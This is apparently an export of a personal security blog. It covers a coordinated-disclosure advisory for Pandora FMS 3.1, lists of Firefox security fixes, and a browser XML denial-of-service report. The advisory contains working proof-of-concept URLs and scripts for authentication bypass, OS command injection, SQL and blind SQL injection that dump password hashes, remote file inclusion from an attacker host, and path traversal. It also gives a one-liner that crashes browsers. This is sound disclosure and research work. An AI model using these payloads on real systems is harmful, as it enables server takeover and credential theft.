tag:blogger.com,1999:blog-6658997759803059662024-03-13T03:42:02.654-07:00Juan GalianaNotes on Computer SecurityJuan Galianahttp://www.blogger.com/profile/14086192616875312638noreply@blogger.comBlogger65125tag:blogger.com,1999:blog-665899775980305966.post-28006662511933545862010-12-12T12:32:00.000-08:002010-12-12T12:59:50.783-08:00Último artículo y advisory publicado en 2010Hola,<br />
<br />
Quería compartir con vosotros un par de enlaces, el primero de ellos es un artículo que escribí hace un par de meses aproximadamente en <a href="http://48bits.com/">48Bits</a> sobre un análisis desde el punto de vista de seguridad de cómo trabaja Microsoft IIS 6 y ASP junto con ciertos componentes de terceros que realizan operaciones sobre carpetas y ficheros, y cómo aprovecharlo para conseguir control total sobre el servidor.<br />
<br />
<a href="http://blog.48bits.com/2010/09/28/iis6-asp-file-upload-for-fun-and-profit/">http://blog.48bits.com/2010/09/28/iis6-asp-file-upload-for-fun-and-profit/</a><br />
<br />
<br />
Por otro lado, la semana pasada publiqué un advisory de seguridad para Pandora FMS, un software de monitorización, que incluye 6 CVE IDs: <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4278">CVE-2010-4278</a>, <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4279">CVE-2010-4279</a>, <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4280">CVE-2010-4280</a>, <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4281">CVE-2010-4281</a>, <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4282">CVE-2010-4282</a>, <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4283">CVE-2010-4283.</a><br />
Entre las vulnerabilidades descubiertas se encuentra un bug que permite saltarse la autenticación a la aplicación pudiendo acceder como cualquier usuario -incluido admin- sin conocer las credenciales de acceso, así como varias vulnerabilidades de validación de entrada, tales como OS Command Injection, SQL Injection, Blind SQL Injection, inclusión de ficheros remota, ejecución de código PHP arbitrario y multiples inclusiones de ficheros locales, que permitirían a un atacante remoto obtener el control total sobre el servidor objetivo. Estas vulnerabilidades fueron notificadas y corregidas, por lo que en el advisory se dan detalles de cómo obtener la nueva versión no afectada por estos bugs.<br />
<br />
He posteado los detalles en el blog pero podeis acceder del mismo modo a través de estos enlaces:<br />
<br />
<a href="http://www.securityfocus.com/bid/45112">http://www.securityfocus.com/bid/45112</a><br />
<a href="http://secunia.com/advisories/42347">http://secunia.com/advisories/42347</a><br />
<a href="http://seclists.org/fulldisclosure/2010/Nov/326">http://seclists.org/fulldisclosure/2010/Nov/326</a> <br />
<br />
<br />
Haciendo un repaso a las conferencias que se han ido celebrando en 2010, este año ha estado muy interesante y he asistido a varias, entre ellas: RootedCON (Madrid), PH-Neutral (Berlín), OWASP AppSec Ireland (Dublin), LaCon (León), hashdays (Lucerne) e IRISSCON (Dublin). Destacar el nivel impresionante que hubo en las charlas de este año de LaCon. Outstanding!<br />
<br />
También ha habido tiempo para disfrutar y viajar un poco, por lo que he ido haciendo algunas escapadas, entre ellas a: Paris, Londres, Bruselas, Amsterdam, Milán, Bérgamo, Venecia, Ginebra, Zurich.... y como no... unas merecidas vacaciones en España! :D . Así que espero que el año que viene sea igual o más productivo y poder cumplir mis objetivos para 2011.Juan Galianahttp://www.blogger.com/profile/14086192616875312638noreply@blogger.com0tag:blogger.com,1999:blog-665899775980305966.post-52668988042746385772010-12-12T11:33:00.000-08:002010-12-12T11:36:37.990-08:00Pandora FMS Authentication Bypass and Multiple Input Validation VulnerabilitiesThese are the details about a security advisory I released last week: <br />
<br />
CVE IDs in this security advisory: <br />
<br />
1) Authentication bypass - CVE-2010-4279<br />
2) OS Command Injection - CVE-2010-4278<br />
3) SQL Injection - CVE-2010-4280<br />
4) Blind SQL Injection - CVE-2010-4280<br />
5) Path Traversal - CVE-2010-4281 - CVE-2010-4282 - CVE-2010-4283<br />
<br />
<br />
[+] Introduction<br />
<br />
Pandora FMS (for Pandora Flexible Monitoring System) is a software solution for monitoring computer networks. It allows monitoring in a visual way the status and performance of several parameters from different operating systems, servers, applications and hardware systems such as firewalls, proxies, databases, web servers or routers.<br />
<br />
It can be deployed in almost any operating system. It features remote monitoring (WMI, SNMP, TCP. UDP, ICMP, HTTP...) and it can also use agents. An agent is available for each platform. It can also monitor hardware systems with a TCP/IP stack, such as load balancers, routers, network switches, printers or firewalls.<br />
<br />
This software has several servers that process and get information from different sources, using WMI for gathering remote Windows information, a predictive server, a plug-in server which makes complex user-defined network tests, an advanced export server to replicate data between different sites of Pandora FMS, a network discovery server, and an SNMP Trap console.<br />
<br />
Released under the terms of the GNU General Public License, Pandora FMS is free software.<br />
<br />
<br />
[+] Description and Proof of Concept<br />
<br />
<br />
1) Authentication bypass - CVE-2010-4279 - CVSS: 10/10<br />
<br />
An attacker could access to any account user, including admin, using the "hash login" authentication process. This kind of authentication method works providing a username and a hash. The issue could be exploited remotely providing a username and the md5 of it when $config['loginhash_pwd'] is empty, that in fact is the default configuration.<br />
<br />
Snippet of vulnerable code in index.php:<br />
<br />
136 // Hash login process<br />
137 if (! isset ($config['id_user']) && isset ($_GET["loginhash"])) {<br />
138 $loginhash_data = get_parameter("loginhash_data", "");<br />
139 $loginhash_user = get_parameter("loginhash_user", "");<br />
140<br />
141 if ($loginhash_data == md5($loginhash_user.$config["loginhash_pwd"])) {<br />
142 logon_db ($loginhash_user, $_SERVER['REMOTE_ADDR']);<br />
143 $_SESSION['id_usuario'] = $loginhash_user;<br />
144 $config["id_user"] = $loginhash_user;<br />
<br />
<br />
<br />
Proof of concept:<br />
<br />
http://servername/pandora_console/index.php?loginhash_data=21232f297a57a5a743894a0e4a801fc3&loginhash_user=admin&loginhash=1<br />
<br />
Got it! admin! :)<br />
<br />
By default, any installation of this software allows unauthenticated attackers to perform an authentication bypass and a privilege escalation to admin.<br />
<br />
<br />
1.1) Additionally, a manual modification in order to use the hash_hmac function instead of the weak statement md5 ( $string . $KEY) is encouraged for security purposes. <br />
<br />
Snippet of code (index.php, version 3.1.1):<br />
<br />
145 // Hash login process<br />
(...)<br />
150 if ($config["loginhash_pwd"] != "" && $loginhash_data == md5($loginhash_user.$config["loginhash_pwd"])) {<br />
<br />
In line 150, use hash_hmac("sha256",$loginhash_user,$config["loginhash_pwd"]), instead of md5($lioginhash_user.$config["loginhash_pwd"])<br />
<br />
<br />
2) OS Command Injection - CVE-2010-4278 - CVSS 9/10<br />
<br />
The layout parameter in file operation/agentes/networkmap.php is not properly filtered and allows an attacker to inject OS commands.<br />
<br />
Snippet of vulnerable code (file operation/agentes/networkmap.php):<br />
<br />
32 $layout = (string) get_parameter ('layout', 'radial');<br />
...<br />
137 $filename_map = $config["attachment_store"]."/networkmap_".$layout;<br />
138 $filename_img = "attachment/networkmap_".$layout."_".$font_size;<br />
139 $filename_dot = $config["attachment_store"]."/networkmap_".$layout;<br />
...<br />
162 $cmd = "$filter -Tcmapx -o".$filename_map." -Tpng -o".$filename_img." ".$filename_dot;<br />
163 $result = system ($cmd);<br />
<br />
PoC:<br />
<br />
http://servername/pandora_console/index.php?login=1&login=1&sec=estado&sec2=operation/agentes/networkmap&refr=0&layout=1;uname%20-a;<br />
http://servername/pandora_console/index.php?login=1&sec=estado&sec2=operation/agentes/networkmap&refr=0&layout=1;id;<br />
<br />
If we use vulnerability #1 (that permits bypass the authentication system and login as admin) with this issue, the CVSS will be 10/10.<br />
<br />
<br />
3) SQL Injection - CVE-2010-4280 - CVSS 8.5/10<br />
<br />
The parameter id_group when get_agents_group_json is equal to 1 is vulnerable to SQL Injection attacks.<br />
<br />
PoC: http://host/pandora_console/ajax.php?page=operation/agentes/ver_agente&get_agents_group_json=1&id_group=1/**/and/**/1=0/**/union/**/select/**/id_user,password/**/from/**/tusuario<br />
<br />
<br />
Exploit:<br />
<br />
# Pandora Flexible Monitoring System SQL Injection PoC<br />
# Juan Galiana Lara<br />
# Gets the list of users and password from the database<br />
#<br />
#configure cookie&host before use it<br />
#usage<br />
#python sqlinj_users.py<br />
#admin:75b756ff2785ea8bb9ae02c13b6a71f1<br />
#...<br />
<br />
import json<br />
import urllib2<br />
<br />
headers = {"Cookie": "PHPSESSID=a4s3nf1tqv2fau8s6qhi6rutp9dahe9o"}<br />
<br />
url = "http://HOST/pandora_console/ajax.php"<br />
url+= "?page=operation/agentes/ver_agente&get_agents_group_json=1&id_group=1"<br />
url+= "/**/and/**/1=0/**/union/**/select/**/id_user,password/**/from/**/tusuario"<br />
<br />
req = urllib2.Request(url,headers=headers)<br />
resp = urllib2.urlopen(req)<br />
<br />
users = json.read(resp.read())<br />
for user in users:<br />
print(user["id_agente"]+":"+user["nombre"])<br />
<br />
<br />
The fix to these kind of issues was the implementation of a generic filter against sql injection. A proper fix is planned for a major version.<br />
<br />
<br />
4) Blind SQL Injection - CVE-2010-4280 - CVSS: 8.5/10<br />
<br />
The parameter group_id of operation/agentes/estado_agente.php is vulnerable to blind sql injection.<br />
<br />
<br />
PoC: http://host/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=24%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,1,1%29%29=49%20and%20id_user=0x61646d696e%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281<br />
<br />
<br />
Exploit:<br />
<br />
#!/bin/bash<br />
# Pandora Flexible Monitoring System Blind SQL Injection PoC<br />
# Juan Galiana Lara<br />
# Gets the md5 hash password from a specific user<br />
#<br />
#configure host,cookie&group_id before use it<br />
#usage<br />
#$ ./getpassword.sh<br />
#74b444ff2785ea8bb9ae02c13b6a71f1<br />
<br />
HOST="HOST"<br />
TARGET_USER="0x61646d696e" #admin<br />
PATTERN="Interval"<br />
COOKIE="rq842tci6e5ib7t918c6sv1ml4"<br />
CHARSET=(0 1 2 3 4 5 6 7 8 9 a b c d e f g h i j k l m n o p q r s t u v w x y z)<br />
GROUP_ID=2<br />
<br />
j=1<br />
while [[ $j -lt 33 ]]; do<br />
i=0<br />
while [[ $i -lt ${#CHARSET[@]} ]]; do<br />
c=$(printf '%d' "'${CHARSET[$i]}")<br />
URL="http://$HOST/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=$GROUP_ID%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,$j,1%29%29=$c%20and%20id_user=$TARGET_USER%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281";<br />
curl $URL --cookie "PHPSESSID=$COOKIE" 2> /dev/null | grep -q $PATTERN;<br />
if [ $? -eq 0 ]; then echo -n ${CHARSET[$i]}; break; fi;<br />
let i++<br />
done;<br />
if [[ $i -eq ${#CHARSET[@]} ]]; then echo "Something went wrong!"; exit 1; fi<br />
let j++;<br />
done<br />
echo<br />
exit 0<br />
<br />
<br />
The fix to these kind of issues was the implementation of a generic filter against sql injection. A proper fix is planned for a major version.<br />
<br />
<br />
5) Path Traversal:<br />
<br />
5.1 - PHP File Inclusion (or RFI/LFI: Remote/Local file inclusion) - CVE-2010-4281 -CVE-2010-4282 - CVSS 8.5/10<br />
<br />
Parameter 'page' of ajax.php is not properly sanitizing user-supplied input. The function safe_url_extraclean is filtering ':' character, and it doesn't allow to use the string "http://" to create urls, but allows '/' character and an attacker could reference remote resources via Windows UNC files, using //servername//resource/file<br />
<br />
Note that the first check in safe_url_extraclean is filtering '://', so we can bypass the filter easily doing http://http://url, and it only strip the first protocol://. However, the last preg_replace strips the : character.<br />
<br />
Proof of concept:<br />
<br />
UNC: http://servername/pandora_console/ajax.php?page=//server/share/test<br />
<br />
As well, ajax.php allows to include any php file in the disk <br />
<br />
filesystem: http://servername/pandora_console/ajax.php?page=../../../../../directory/file<br />
<br />
Character is not allowed due safe_url_extraclean function filtering, and is not possible to include other files distinct that php files, but still allows . and / characters.<br />
<br />
<br />
5.2 - PHP File Inclusion (or RFI Remote file inclusion) - CVE-2010-4283 - CVSS 7.9/10<br />
<br />
An attacker can inject arbitrary PHP code and execute it remotely due argv[1] parameter is not filtered in file pandora_diag.php.<br />
<br />
PoC:<br />
http://servername/pandora_console/extras/pandora_diag.php?argc=2&argv[1]=http://serverattacker/salsa.php<br />
<br />
Note: that issue needs register_globals set to On to be exploitable.<br />
<br />
<br />
5.3 - Path traversal & Local file inclusion vulnerabilities - CVE-2010-4282 - CVSS 6.8/10<br />
<br />
An attacker can include arbitrary files of the filesystem via id parameter in file pandora_help.php.<br />
<br />
<br />
Snippet of vulnerable code:<br />
<br />
24 $id = get_parameter ('id');<br />
25<br />
26 /* Possible file locations */<br />
27 $files = array ($config["homedir"]."/include/help/".$config["language"]."/help_".$id.".php",<br />
28 $config["homedir"].ENTERPRISE_DIR."/include/help/".$config["language"]."/help_".$id.".php",<br />
29 $config["homedir"].ENTERPRISE_DIR."/include/help/en/help_".$id.".php",<br />
30 $config["homedir"]."/include/help/en/help_".$id.".php");<br />
31 $help_file = '';<br />
32 foreach ($files as $file) {<br />
33 if (file_exists ($file)) {<br />
34 $help_file = $file;<br />
35 break;<br />
36 }<br />
37 }<br />
...<br />
62 require_once ($help_file);<br />
<br />
<br />
Proof of concept:<br />
<br />
http://servername/pandora_console/general/pandora_help.php?id=/../../../../../../../boot.ini<br />
<br />
This code is platform dependent bug, you can read more at http://seclists.org/fulldisclosure/2010/Jul/137<br />
Only works in windows systems, an attacker can include local file using ../ characters due parameter id is not filtered<br />
If magic_quotes_gpc is Off, arbitrary files can be included, like boot.ini using NULL character (), if not, only php files are allowed<br />
<br />
<br />
5.4 - Path traversal & Arbitrary write and delete files - CVE-2010-4282 - CVSS 8.0/10<br />
<br />
In file operation/agentes/networkmap.php the 'layout' parameter is handled in an insecure way and it is used to write and delete files on the filesystem.<br />
An attacker could use this parameter to write in arbitrary paths and even remove files.<br />
<br />
Snippet of vulnerable code:<br />
<br />
32 $layout = (string) get_parameter ('layout', 'radial');<br />
...<br />
137 $filename_map = $config["attachment_store"]."/networkmap_".$layout;<br />
138 $filename_img = "attachment/networkmap_".$layout."_".$font_size;<br />
139 $filename_dot = $config["attachment_store"]."/networkmap_".$layout;<br />
...<br />
157 $fh = @fopen ($filename_dot, 'w');<br />
158 if ($fh === false) {<br />
159 $result = false;<br />
160 } else {<br />
161 fwrite ($fh, $graph);<br />
162 $cmd = "$filter -Tcmapx -o".$filename_map." -Tpng -o".$filename_img." ".$filename_dot;<br />
163 $result = system ($cmd);<br />
164 fclose ($fh);<br />
165 unlink ($filename_dot);<br />
166 }<br />
...<br />
178 require ($filename_map);<br />
<br />
<br />
Character sequences '../' could be used to write files (due -o parameter in lines 162 and 163), as well as potentially remove files (line 157, 161 and 165) or include them (line 178)<br />
As well like in 5.3 this issue is only exploitable in windows environments because the same reason.<br />
<br />
<br />
[+] Impact<br />
<br />
An attacker can execute commands of the operating system, inject remote code in the context of the application, get arbitrary files from the filesystem or extract any data of the database including passwords and confidential information about the monitored network/systems. Also it is possible to bypass the authentication or scale privileges to became admin, gaining full control of the web application and web server. These vulnerabilities have a high impact to the confidentiality, integrity, and availability of the system.<br />
<br />
<br />
[+] Systems affected<br />
<br />
Versions prior and including 3.1 of Pandora FMS are affected<br />
<br />
<br />
[+] Solution<br />
<br />
Apply the security fix for version 3.1: http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download <br />
<br />
Or upgrade to version 3.1.1 from http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/3.1.1/<br />
<br />
<br />
[+] Timeline<br />
<br />
Ago 2010: First contact to vendor<br />
Ago 2010: Confirmation of vendor<br />
Sept 2010: Second contact: SQL Injection vulnerabilities<br />
Sept 2010: Confirmation that the fix will be released on October<br />
Oct 2010: PandoraFMS security patch for 3.1 version released<br />
Oct 2010: Request for CVE numbers<br />
Nov 2010: PandoraFMS version 3.1.1 released<br />
Nov 2010: Disclosure of this advisory<br />
<br />
<br />
[+] References<br />
<br />
Official PandoraFMS site: http://pandorafms.org/<br />
SourceForge PandoraFMS site: http://sourceforge.net/projects/pandora/<br />
Wikipedia entry about PandoraFMS: http://en.wikipedia.org/wiki/Pandora_FMS<br />
Common Vulnerability Scoring System (CVSS) v2 calculator: http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2<br />
Common Vulnerabilities and Exposures (CVE): http://cve.mitre.org/<br />
<br />
<br />
[+] Credits<br />
<br />
These vulnerabilities has been discovered by Juan Galiana Lara - @jgaliana - http://juangaliana.blogspot.com/<br />
<br />
<br />
Links:<br />
<br />
<a href="http://www.securityfocus.com/bid/45112">http://www.securityfocus.com/bid/45112</a><br />
<a href="http://secunia.com/advisories/42347">http://secunia.com/advisories/42347</a><br />
<a href="http://seclists.org/fulldisclosure/2010/Nov/326">http://seclists.org/fulldisclosure/2010/Nov/326</a>Juan Galianahttp://www.blogger.com/profile/14086192616875312638noreply@blogger.com0tag:blogger.com,1999:blog-665899775980305966.post-18727183845829771602010-07-21T03:09:00.000-07:002010-09-24T04:47:05.332-07:00Mozilla Firefox 3.6.7 soluciona varias vulnerabilidades críticasUna nota rápida para comentar esta importante actualización de Firefox a su versión 3.6.7, la cual corregidas varias vulnerabilidades críticas:<br />
<br />
<style type="text/css">
.critical { background-color: #ff8080; }
.high { background-color: #ffc080; }
.moderate { background-color: #ffff80; }
.low { color: #148CB5; }
</style><br />
<h3 id="firefox3.6.7">Fixed in Firefox 3.6.7</h3><br />
<a class="moderate" href="http://www.mozilla.org//security/announce/2010/mfsa2010-47.html">MFSA 2010-47</a> Cross-origin data leakage from script filename in error messages<br />
<a class="moderate" href="http://www.mozilla.org//security/announce/2010/mfsa2010-46.html">MFSA 2010-46</a> Cross-domain data theft using CSS<br />
<a class="moderate" href="http://www.mozilla.org//security/announce/2010/mfsa2010-45.html">MFSA 2010-45</a> Multiple location bar spoofing vulnerabilities<br />
<a class="moderate" href="http://www.mozilla.org//security/announce/2010/mfsa2010-44.html">MFSA 2010-44</a> Characters mapped to U+FFFD in 8 bit encodings cause subsequent character to vanish<br />
<a class="high" href="http://www.mozilla.org//security/announce/2010/mfsa2010-43.html">MFSA 2010-43</a> Same-origin bypass using canvas context<br />
<a class="high" href="http://www.mozilla.org//security/announce/2010/mfsa2010-42.html">MFSA 2010-42</a> Cross-origin data disclosure via Web Workers and importScripts<br />
<a class="critical" href="http://www.mozilla.org//security/announce/2010/mfsa2010-41.html">MFSA 2010-41</a> Remote code execution using malformed PNG image<br />
<a class="critical" href="http://www.mozilla.org//security/announce/2010/mfsa2010-40.html">MFSA 2010-40</a> nsTreeSelection dangling pointer remote code execution vulnerability<br />
<a class="critical" href="http://www.mozilla.org//security/announce/2010/mfsa2010-39.html">MFSA 2010-39</a> nsCSSValue::Array index integer overflow<br />
<a class="critical" href="http://www.mozilla.org//security/announce/2010/mfsa2010-38.html">MFSA 2010-38</a> Arbitrary code execution using SJOW and fast native function<br />
<a class="critical" href="http://www.mozilla.org//security/announce/2010/mfsa2010-37.html">MFSA 2010-37</a> Plugin parameter EnsureCachedAttrParamArrays remote code execution vulnerability<br />
<a class="critical" href="http://www.mozilla.org//security/announce/2010/mfsa2010-36.html">MFSA 2010-36</a> Use-after-free error in NodeIterator<br />
<a class="critical" href="http://www.mozilla.org//security/announce/2010/mfsa2010-35.html">MFSA 2010-35</a> DOM attribute cloning remote code execution vulnerability<br />
<a class="critical" href="http://www.mozilla.org//security/announce/2010/mfsa2010-34.html">MFSA 2010-34</a> Miscellaneous memory safety hazards (rv:1.9.2.7/ 1.9.1.11)<br />
<br />
<br />
Haz click en el enlace de cada vulnerabilidad para obtener los detalles técnicos.<br />
<br />
<br />
<b>Actualización:</b><br />
<br />
<h3 id="firefox3.6.8">Fixed in Firefox 3.6.8</h3><br />
<a class="critical" href="http://www.blogger.com/security/announce/2010/mfsa2010-48.html">MFSA 2010-48</a> Dangling pointer crash regression from plugin parameter array fix<br />
<br />
<h3 id="firefox3.6.9">Fixed in Firefox 3.6.9</h3><br />
<a class="low" href="http://www.blogger.com/security/announce/2010/mfsa2010-63.html">MFSA 2010-63</a>Information leak via XMLHttpRequest statusText<br />
<a class="moderate" href="http://www.blogger.com/security/announce/2010/mfsa2010-62.html">MFSA 2010-62</a>Copy-and-paste or drag-and-drop into designMode document allows XSS<br />
<a class="high" href="http://www.blogger.com/security/announce/2010/mfsa2010-61.html">MFSA 2010-61</a>UTF-7 XSS by overriding document charset using <object> type attribute<br />
<a class="critical" href="http://www.blogger.com/security/announce/2010/mfsa2010-59.html">MFSA 2010-59</a>SJOW creates scope chains ending in outer object<br />
<a class="critical" href="http://www.blogger.com/security/announce/2010/mfsa2010-58.html">MFSA 2010-58</a>Crash on Mac using fuzzed font in data: URL<br />
<a class="critical" href="http://www.blogger.com/security/announce/2010/mfsa2010-57.html">MFSA 2010-57</a>Crash and remote code execution in normalizeDocument<br />
<a class="critical" href="http://www.blogger.com/security/announce/2010/mfsa2010-56.html">MFSA 2010-56</a>Dangling pointer vulnerability in nsTreeContentView<br />
<a class="low" href="http://www.blogger.com/security/announce/2010/mfsa2010-55.html">MFSA 2010-55</a>XUL tree removal crash and remote code execution<br />
<a class="critical" href="http://www.blogger.com/security/announce/2010/mfsa2010-54.html">MFSA 2010-54</a>Dangling pointer vulnerability in nsTreeSelection<br />
<a class="critical" href="http://www.blogger.com/security/announce/2010/mfsa2010-53.html">MFSA 2010-53</a>Heap buffer overflow in nsTextFrameUtils::TransformText<br />
<a class="critical" href="http://www.blogger.com/security/announce/2010/mfsa2010-52.html">MFSA 2010-52</a>Windows XP DLL loading vulnerability<br />
<a class="critical" href="http://www.blogger.com/security/announce/2010/mfsa2010-51.html">MFSA 2010-51</a>Dangling pointer vulnerability using DOM plugin array<br />
<a class="critical" href="http://www.blogger.com/security/announce/2010/mfsa2010-50.html">MFSA 2010-50</a>Frameset integer overflow vulnerability<br />
<a class="critical" href="http://www.blogger.com/security/announce/2010/mfsa2010-49.html">MFSA 2010-49</a>Miscellaneous memory safety hazards (rv:1.9.2.9/ 1.9.1.12)<br />
<br />
<br />
<br />
<b>Update it!</b> Check it out: <a href="http://www.mozilla.com/">http://www.mozilla.com/ </a><br />
Last release available is 3.6.10Juan Galianahttp://www.blogger.com/profile/14086192616875312638noreply@blogger.com0tag:blogger.com,1999:blog-665899775980305966.post-56040329229929008182010-07-07T06:09:00.000-07:002010-07-07T06:59:05.467-07:00XML Denial of Service sin parchear en Firefox 3.6.6 / 4beta1Hola,<br />
<br />
En la época que estuve trabajando en <a href="http://isecauditors.com/">Internet Security Auditors</a> en Barcelona, escribí un advisory sobre una bug que afectaba a Apple Safari, Opera y Mozilla Firefox.<br />
<br />
Se contactó con todos ellos (a principios de año) para enviarles el informe, y poco después Opera y Safari sacaban una nueva versión que corregía el fallo. A día de hoy Mozilla todavía no ha resuelto el bug.<br />
<br />
Respecto a Opera podeis descargar la <a href="http://www.opera.com/">versión 10.60</a>, y en cuanto a Safari la <a href="http://www.apple.com/safari">version 5</a>, últimas versiones de ambos navegadores. (Las últimas versiones afectadas fueron Opera 10.10 y Safari 4.0.5)<br />
<br />
<br />
El caso que me interesa comentar es el de <b>Mozilla Firefox</b>, el informe que se envió contenia información a cerca de como reproducir el bug. Copio algunas partes del mismo:<br />
<br />
<br />
Descripción:<br />
<br />
The XML parser of the browsers Safari, Firefox and Opera are affected by a Stack Overflow (Stack Exhaustion) due to incorrect handling of XML files, resulting in a remote denial of service, crashing the affected users browser.<br />
<br />
Proof of Concept:<br />
<br />
$ perl -e 'print "<<x>x</x>><x>"30000' > poc.xml<br />
<br />
(Opera crashes at ~7K, Safari at ~9K and Firefox at ~30K)<br />
<br />
<br />
Aqui se puede ver con más detalle lo que sucede:<br />
<br />
+ Safari 4.0.4 on Mac OS X 10.6:<br />
<br />
$ gdb /Applications/Safari.app/Contents/MacOS/Safari <br />
GNU gdb 6.3.50-20050815 (Apple version gdb-1346) (Fri Sep 18 20:40:51 UTC 2009)<br />
Copyright 2004 Free Software Foundation, Inc.<br />
GDB is free software, covered by the GNU General Public License, and you are<br />
welcome to change it and/or distribute copies of it under certain conditions.<br />
Type "show copying" to see the conditions.<br />
There is absolutely no warranty for GDB. Type "show warranty" for details.<br />
This GDB was configured as "x86_64-apple-darwin"...Reading symbols for shared libraries .......................... done<br />
<br />
(gdb) r<br />
Starting program: /Applications/Safari.app/Contents/MacOS/Safari <br />
Reading symbols for shared libraries .+++++++++++++++++++++++++......................................................................................................... done<br />
Reading symbols for shared libraries . done<br />
Reading symbols for shared libraries . done<br />
Reading symbols for shared libraries . done<br />
Reading symbols for shared libraries . done<br />
Reading symbols for shared libraries . done<br />
Reading symbols for shared libraries . done<br />
Reading symbols for shared libraries . done<br />
Reading symbols for shared libraries . done<br />
Reading symbols for shared libraries .. done<br />
Reading symbols for shared libraries .. done<br />
<br />
Program received signal EXC_BAD_ACCESS, Could not access memory.<br />
Reason: KERN_PROTECTION_FAILURE at address: 0x00007fff5f3ffff0<br />
0x00007fff861e2784 in WebCore::InlineFlowBox::placeBoxesVertically ()<br />
(gdb) where 10<br />
#0 0x00007fff861e2784 in WebCore::InlineFlowBox::placeBoxesVertically ()<br />
#1 0x00007fff861e2cdd in WebCore::InlineFlowBox::placeBoxesVertically ()<br />
#2 0x00007fff861e2cdd in WebCore::InlineFlowBox::placeBoxesVertically ()<br />
#3 0x00007fff861e2cdd in WebCore::InlineFlowBox::placeBoxesVertically ()<br />
#4 0x00007fff861e2cdd in WebCore::InlineFlowBox::placeBoxesVertically ()<br />
#5 0x00007fff861e2cdd in WebCore::InlineFlowBox::placeBoxesVertically ()<br />
#6 0x00007fff861e2cdd in WebCore::InlineFlowBox::placeBoxesVertically ()<br />
#7 0x00007fff861e2cdd in WebCore::InlineFlowBox::placeBoxesVertically ()<br />
#8 0x00007fff861e2cdd in WebCore::InlineFlowBox::placeBoxesVertically ()<br />
#9 0x00007fff861e2cdd in WebCore::InlineFlowBox::placeBoxesVertically ()<br />
(More stack frames follow...)<br />
(gdb) i f<br />
Stack level 0, frame at 0x7fff5f4000c0:<br />
rip = 0x7fff861e2784 in WebCore::InlineFlowBox::placeBoxesVertically(int, int, int, bool, int&, int&, int&, int&); saved rip 0x7fff861e2cdd<br />
called by frame at 0x7fff5f400230<br />
Arglist at 0x7fff5f4000b8, args: <br />
Locals at 0x7fff5f4000b8, Previous frame's sp is 0x7fff5f4000c0<br />
Saved registers:<br />
rbx at 0x7fff5f400088, rbp at 0x7fff5f4000b0, r12 at 0x7fff5f400090, r13 at 0x7fff5f400098, r14 at 0x7fff5f4000a0, r15 at 0x7fff5f4000a8, rip at 0x7fff5f4000b8<br />
(gdb) i r<br />
rax 0x7fff5fbfd2c4 140734799794884<br />
rbx 0x1 1<br />
rcx 0xe 14<br />
rdx 0x12 18<br />
rsi 0x0 0<br />
rdi 0x11a0c1420 4731966496<br />
rbp 0x7fff5f4000b0 0x7fff5f4000b0<br />
rsp 0x7fff5f3fff50 0x7fff5f3fff50<br />
r8 0x1 1<br />
r9 0x7fff5fbfd2cc 140734799794892<br />
r10 0x11a231000 4733472768<br />
r11 0x7fff861e94f0 140735443539184<br />
r12 0x100500d68 4300213608<br />
r13 0x119c1d8a8 4727101608<br />
r14 0x11a0c1420 4731966496<br />
r15 0x7fff5f4001d8 140734791418328<br />
rip 0x7fff861e2784 0x7fff861e2784 <webcore::inlineflowbox::placeboxesvertically(int, bool,="" int&)+20="" int&,="" int,=""><br />
eflags 0x10206 66054<br />
cs 0x27 39<br />
ss 0x0 0<br />
ds 0x0 0<br />
es 0x0 0<br />
fs 0x0 0<br />
gs 0x0 0<br />
(gdb) <br />
<br />
<br />
<br />
Addition information:<br />
<br />
Process: Safari [51732]<br />
Path: /Applications/Safari.app/Contents/MacOS/Safari<br />
Identifier: com.apple.Safari<br />
Version: 4.0.4 (6531.21.10)<br />
Build Info: WebBrowser-65312110~2<br />
Code Type: X86-64 (Native)<br />
Parent Process: launchd [828]<br />
<br />
Date/Time: 2010-02-06 12:53:16.908 +0100<br />
OS Version: Mac OS X 10.6.2 (10C540)<br />
Report Version: 6<br />
<br />
(...)<br />
<br />
Exception Type: EXC_BAD_ACCESS (SIGSEGV)<br />
Exception Codes: KERN_PROTECTION_FAILURE at 0x00007fff5f3ffff8<br />
Crashed Thread: 0 Dispatch queue: com.apple.main-thread<br />
<br />
<br />
+ Firefox 3.6 on Windows XP SP2:<br />
<br />
(dfc.f14): Stack overflow - code c00000fd (first chance)<br />
First chance exceptions are reported before any exception handling.<br />
This exception may be expected and handled.<br />
eax=00000000 ebx=0332e348 ecx=054d0550 edx=036ee700 esi=00000000 edi=0332e348<br />
eip=100f1338 esp=00033000 ebp=00000000 iopl=0 nv up ei pl nz na po nc<br />
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202<br />
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Archivos de programa\Mozilla Firefox\xul.dll - <br />
xul!NS_Realloc_P+0x3f68:<br />
100f1338 56 push esi<br />
Missing image name, possible paged-out or corrupt data.<br />
Missing image name, possible paged-out or corrupt data.<br />
0:000> !analyze -v<br />
(...)<br />
FAULTING_IP: <br />
xul!NS_Realloc_P+3f68<br />
100f1338 56 push esi<br />
<br />
EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)<br />
ExceptionAddress: 100f1338 (xul!NS_Realloc_P+0x00003f68)<br />
ExceptionCode: c00000fd (Stack overflow)<br />
ExceptionFlags: 00000000<br />
NumberParameters: 2<br />
Parameter[0]: 00000001<br />
Parameter[1]: 00032ffc<br />
<br />
FAULTING_THREAD: 00000f14<br />
<br />
